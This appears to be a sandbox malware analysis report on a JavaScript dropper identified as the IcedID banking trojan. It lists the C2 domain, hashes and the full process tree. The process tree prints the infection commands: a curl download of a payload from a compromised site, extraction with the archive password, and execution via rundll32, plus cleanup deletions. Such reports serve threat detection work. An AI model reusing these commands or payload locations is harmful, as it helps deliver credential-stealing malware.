Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    136s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2023, 01:39

General

  • Target

    Document_09_13_927.js

  • Size

    43KB

  • MD5

    03677c4079fafd6413c5552f3d6da926

  • SHA1

    28f14a816b7fb22630c7d59af9d404f51dab4f69

  • SHA256

    32ee3a4074bff70f212b88233f37f72796982c3e579fcdcc7c773ae5c41ae010

  • SHA512

    debf24ab43ea09c567afe47e5289fad62fb19e7d8d1d6401e466feec1f1da84e3652e06854750e0911cdeead48b7a86bfeb74e440ca43bbda9588162da9875fc

  • SSDEEP

    384:eo/1qDp3h548/pzFhb2uhK2U2yoWmfrL4tuEsSRqQ1SDIJnjOsetOI88s8vr6z1d:/qHLi+lIR6J2kzqpaJfs9

Malware Config

Extracted

Family

icedid

Campaign

1638996626

C2

minutozhart.online

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_09_13_927.js"
      2⤵
        PID:576
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c echo curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
        2⤵
          PID:4644
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Windows\system32\curl.exe
            curl https://shankarmallapur.com/wp-content/ewww/image-backup/uploads/2019/11/6603.7z --output "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" --ssl-no-revoke --insecure --location
            3⤵
              PID:4128
          • C:\Windows\System32\curl.exe
            "C:\Windows\System32\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\Admin\AppData\Local\Temp\neque.j"
            2⤵
              PID:4588
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p" > "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:788
              • C:\Users\Admin\AppData\Local\Temp\neque.j
                "C:\Users\Admin\AppData\Local\Temp\neque.j" -p#4p2h@!eiNtKVN46 e -so "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2040
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\neque.j"
              2⤵
                PID:1276
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\voluptatem.p"
                2⤵
                  PID:4280
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i" "quia.j"
                  2⤵
                    PID:1944
                  • C:\Windows\System32\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\quia.j", scab /k abebas531
                    2⤵
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:4332
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
                    2⤵
                      PID:2696

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\neque.j

                    Filesize

                    571KB

                    MD5

                    58fc6de6c4e5d2fda63565d54feb9e75

                    SHA1

                    0586248c327d21efb8787e8ea9f553ddc03493ec

                    SHA256

                    72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

                    SHA512

                    e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

                  • C:\Users\Admin\AppData\Local\Temp\neque.j

                    Filesize

                    571KB

                    MD5

                    58fc6de6c4e5d2fda63565d54feb9e75

                    SHA1

                    0586248c327d21efb8787e8ea9f553ddc03493ec

                    SHA256

                    72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b

                    SHA512

                    e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

                  • C:\Users\Admin\AppData\Local\Temp\quia.j

                    Filesize

                    200KB

                    MD5

                    396f81c0274b21d8474a3f39f5188650

                    SHA1

                    426da78e8db7c72f83a02696140b79190f2ee920

                    SHA256

                    fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad

                    SHA512

                    77fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d

                  • C:\Users\Admin\AppData\Local\Temp\quia.j.bat

                    Filesize

                    184B

                    MD5

                    69d466581b9f52f28ca830ea196000d1

                    SHA1

                    e28316b3d54e97322014e898b4025139286c014c

                    SHA256

                    4d0fa867e22ced070e431af28666e0e2caaa1822b61f0424610a903e73f87118

                    SHA512

                    b8cdbcafb5e8b2b12fd2bb3041ca4bbd2f533b1069911cea355e647044ee3cd795671fba486f44125835d60a93876485d6784db31eb080707daeac105922844e

                  • C:\Users\Admin\AppData\Local\Temp\quia.jdignissimos.i

                    Filesize

                    200KB

                    MD5

                    396f81c0274b21d8474a3f39f5188650

                    SHA1

                    426da78e8db7c72f83a02696140b79190f2ee920

                    SHA256

                    fcacd2b44ede98c12164abc1fbe8b58a949d26e2c8378ea43f2342abbf3a7cad

                    SHA512

                    77fb6a6273aebcb902bd7aa89315ad4746f462343ed1652e1fc50891e4b9e397615903886674cdd5b3ddda8e339072d9c37a569172b8147890ed68d80708ab1d

                  • C:\Users\Admin\AppData\Local\Temp\voluptatem.p

                    Filesize

                    81KB

                    MD5

                    6d78b958989a6ad56aa0d3a8f8ac821e

                    SHA1

                    5de1912c211a54cebf38ac6d0ecfc9ff0c645a87

                    SHA256

                    161e14ad8be2cf07c1d0dcfcad5db86e8d450e1b260970a614a7e2ff180ef1e7

                    SHA512

                    e099f9a0d3cece1259a6029f6950b20ced070361f0ea00ff19d3404429f9362724087b42447a99c090ce042e5fe6eef4941aa7bfbd671222c6e6316cffe1ab55

                  • memory/3340-12-0x00007FF831761000-0x00007FF831762000-memory.dmp

                    Filesize

                    4KB

                  • memory/3340-13-0x0000000180000000-0x0000000180009000-memory.dmp

                    Filesize

                    36KB

                  • memory/3340-20-0x00007FF831761000-0x00007FF831762000-memory.dmp

                    Filesize

                    4KB

                  • memory/4332-11-0x0000029390080000-0x0000029390084000-memory.dmp

                    Filesize

                    16KB